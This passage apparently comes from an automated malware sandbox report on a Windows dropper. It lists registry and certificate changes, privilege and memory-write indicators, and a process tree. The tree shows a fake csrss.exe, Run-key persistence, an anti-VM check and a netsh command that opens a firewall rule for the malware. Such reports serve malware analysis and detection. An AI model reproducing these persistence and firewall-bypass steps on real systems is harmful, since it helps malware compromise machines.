Settings\ZoneMap\AutoDetect = "0" Assistant_106.0.4998.16_Setup.exe_sfx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" LhAVHTNnye4bvT2Dg2S6kl8j.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" SpBYaRE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{05dfbecd-0000-0000-0000-d01200000000} SpBYaRE.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{05dfbecd-0000-0000-0000-d01200000000}\MaxCapacity = "14116" SpBYaRE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 iJlEkkLqIhtnHVfNj6uUp1Lx.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e iJlEkkLqIhtnHVfNj6uUp1Lx.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e iJlEkkLqIhtnHVfNj6uUp1Lx.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 576 powershell.exe 576 powershell.exe 2464 powershell.exe 2464 powershell.exe 1368 powershell.exe 1368 powershell.exe 4480 LhAVHTNnye4bvT2Dg2S6kl8j.exe 4480 LhAVHTNnye4bvT2Dg2S6kl8j.exe 4636 cPQQU4ymXIiQrXbc4lY3hAxs.exe 4636 cPQQU4ymXIiQrXbc4lY3hAxs.exe 1888 powershell.exe 1888 powershell.exe 3052 WerFault.exe 3052 WerFault.exe 1888 powershell.exe 3052 WerFault.exe 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 1244 powershell.exe 1244 powershell.exe 1244 powershell.exe 4428 Assistant_106.0.4998.16_Setup.exe_sfx.exe 4428 Assistant_106.0.4998.16_Setup.exe_sfx.exe 4428 Assistant_106.0.4998.16_Setup.exe_sfx.exe 2052 powershell.exe 2052 powershell.exe 2052 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 4392 WerFault.exe 4392 WerFault.exe 4392 WerFault.exe 4752 powershell.exe 4752 powershell.exe 4752 powershell.exe 4120 reg.exe 4120 reg.exe 4120 reg.exe 4260 powershell.EXE 4260 powershell.EXE 4260 powershell.EXE 4620 injector.exe 4620 injector.exe 4620 injector.exe 4620 injector.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 688 CasPol.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 4480 LhAVHTNnye4bvT2Dg2S6kl8j.exe Token: SeImpersonatePrivilege 4480 LhAVHTNnye4bvT2Dg2S6kl8j.exe Token: SeDebugPrivilege 4636 cPQQU4ymXIiQrXbc4lY3hAxs.exe Token: SeImpersonatePrivilege 4636 cPQQU4ymXIiQrXbc4lY3hAxs.exe Token: SeDebugPrivilege 1888 powershell.exe Token: SeDebugPrivilege 3052 WerFault.exe Token: SeDebugPrivilege 1244 powershell.exe Token: SeDebugPrivilege 4428 Assistant_106.0.4998.16_Setup.exe_sfx.exe Token: SeDebugPrivilege 2052 powershell.exe Token: SeDebugPrivilege 2268 powershell.exe Token: SeDebugPrivilege 4392 WerFault.exe Token: SeDebugPrivilege 4752 powershell.exe Token: SeDebugPrivilege 4120 reg.exe Token: SeSystemEnvironmentPrivilege 1148 csrss.exe Token: SeDebugPrivilege 4260 powershell.EXE Token: SeSecurityPrivilege 4852 reg.exe Token: SeSecurityPrivilege 4852 reg.exe Token: SeDebugPrivilege 1748 powershell.exe Token: SeDebugPrivilege 1352 powershell.exe Token: SeDebugPrivilege 2852 powershell.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2148 jTKkLDWW97ArlwvIoFA1XRD3.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3624 wrote to memory of 576 3624 WerFault.exe 87 PID 3624 wrote to memory of 576 3624 WerFault.exe 87 PID 3624 wrote to memory of 576 3624 WerFault.exe 87 PID 3624 wrote to memory of 688 3624 WerFault.exe 85 PID 3624 wrote to memory of 688 3624 WerFault.exe 85 PID 3624 wrote to memory of 688 3624 WerFault.exe 85 PID 3624 wrote to memory of 688 3624 WerFault.exe 85 PID 3624 wrote to memory of 688 3624 WerFault.exe 85 PID 3624 wrote to memory of 688 3624 WerFault.exe 85 PID 3624 wrote to memory of 688 3624 WerFault.exe 85 PID 3624 wrote to memory of 688 3624 WerFault.exe 85 PID 688 wrote to memory of 4636 688 CasPol.exe 88 PID 688 wrote to memory of 4636 688 CasPol.exe 88 PID 688 wrote to memory of 4636 688 CasPol.exe 88 PID 688 wrote to memory of 4480 688 CasPol.exe 220 PID 688 wrote to memory of 4480 688 CasPol.exe 220 PID 688 wrote to memory of 4480 688 CasPol.exe 220 PID 4480 wrote to memory of 2464 4480 LhAVHTNnye4bvT2Dg2S6kl8j.exe 135 PID 4480 wrote to memory of 2464 4480 LhAVHTNnye4bvT2Dg2S6kl8j.exe 135 PID 4480 wrote to memory of 2464 4480 LhAVHTNnye4bvT2Dg2S6kl8j.exe 135 PID 4636 wrote to memory of 1368 4636 cPQQU4ymXIiQrXbc4lY3hAxs.exe 132 PID 4636 wrote to memory of 1368 4636 cPQQU4ymXIiQrXbc4lY3hAxs.exe 132 PID 4636 wrote to memory of 1368 4636 cPQQU4ymXIiQrXbc4lY3hAxs.exe 132 PID 2952 wrote to memory of 1888 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 189 PID 2952 wrote to memory of 1888 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 189 PID 2952 wrote to memory of 1888 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 189 PID 1172 wrote to memory of 3052 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 216 PID 1172 wrote to memory of 3052 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 216 PID 1172 wrote to memory of 3052 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 216 PID 688 wrote to memory of 3428 688 CasPol.exe 221 PID 688 wrote to memory of 3428 688 CasPol.exe 221 PID 688 wrote to memory of 3428 688 CasPol.exe 221 PID 3428 wrote to memory of 4712 3428 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 233 PID 3428 wrote to memory of 4712 3428 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 233 PID 3428 wrote to memory of 4712 3428 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 233 PID 3428 wrote to memory of 4604 3428 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 278 PID 3428 wrote to memory of 4604 3428 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 278 PID 3428 wrote to memory of 4604 3428 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 278 PID 1172 wrote to memory of 3412 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 353 PID 1172 wrote to memory of 3412 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 353 PID 2952 wrote to memory of 5016 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 317 PID 2952 wrote to memory of 5016 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 317 PID 3428 wrote to memory of 332 3428 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 227 PID 3428 wrote to memory of 332 3428 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 227 PID 3428 wrote to memory of 332 3428 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 227 PID 332 wrote to memory of 1492 332 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 223 PID 332 wrote to memory of 1492 332 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 223 PID 332 wrote to memory of 1492 332 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 223 PID 3412 wrote to memory of 2864 3412 reg.exe 376 PID 3412 wrote to memory of 2864 3412 reg.exe 376 PID 5016 wrote to memory of 1992 5016 Conhost.exe 225 PID 5016 wrote to memory of 1992 5016 Conhost.exe 225 PID 1172 wrote to memory of 1244 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 230 PID 1172 wrote to memory of 1244 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 230 PID 1172 wrote to memory of 1244 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 230 PID 2952 wrote to memory of 4428 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 270 PID 2952 wrote to memory of 4428 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 270 PID 2952 wrote to memory of 4428 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 270 PID 1172 wrote to memory of 2052 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 236 PID 1172 wrote to memory of 2052 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 236 PID 1172 wrote to memory of 2052 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 236 PID 2952 wrote to memory of 2268 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 239 PID 2952 wrote to memory of 2268 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 239 PID 2952 wrote to memory of 2268 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 239 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe"C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe"1⤵PID:3624
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Users\Admin\Pictures\cPQQU4ymXIiQrXbc4lY3hAxs.exe"C:\Users\Admin\Pictures\cPQQU4ymXIiQrXbc4lY3hAxs.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 3284⤵
- Program crash
PID:3844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 3884⤵
- Program crash
PID:2464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 6804⤵
- Program crash
PID:3528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 6244⤵
- Program crash
PID:3912
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 8804⤵
- Program crash
PID:1620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 9044⤵
- Program crash
PID:3428
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 6444⤵
- Program crash
PID:2344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 8964⤵
- Program crash
PID:4124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 7164⤵
- Program crash
PID:4456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 8764⤵
- Program crash
PID:3856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 8924⤵
- Program crash
PID:3284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 7444⤵
- Program crash
PID:4084
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 8644⤵
- Program crash
PID:3680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 7324⤵
- Program crash
PID:4056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 7484⤵
- Program crash
PID:1680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 7324⤵
- Program crash
PID:2740
-
-
C:\Users\Admin\Pictures\cPQQU4ymXIiQrXbc4lY3hAxs.exe"C:\Users\Admin\Pictures\cPQQU4ymXIiQrXbc4lY3hAxs.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 7245⤵
- Program crash
PID:780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 7325⤵
- Program crash
PID:1844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 8005⤵
- Program crash
PID:1064
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:3052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 6645⤵
- Program crash
PID:4924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 6645⤵
- Program crash
PID:3952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 6525⤵
- Program crash
PID:5000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 3605⤵
- Program crash
PID:4948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 3565⤵
- Program crash
PID:3312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 3405⤵
- Program crash
PID:4640
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:3412
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1148 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 3766⤵
- Program crash
PID:2708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 3926⤵
- Program crash
PID:3668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 4006⤵
- Program crash
PID:2636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 6766⤵
- Program crash
PID:4388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 7286⤵
- Program crash
PID:2344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 7286⤵
- Program crash
PID:4428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 7126⤵
- Program crash
PID:3584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 7606⤵
- Program crash
PID:1788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 7806⤵PID:776
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4392
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
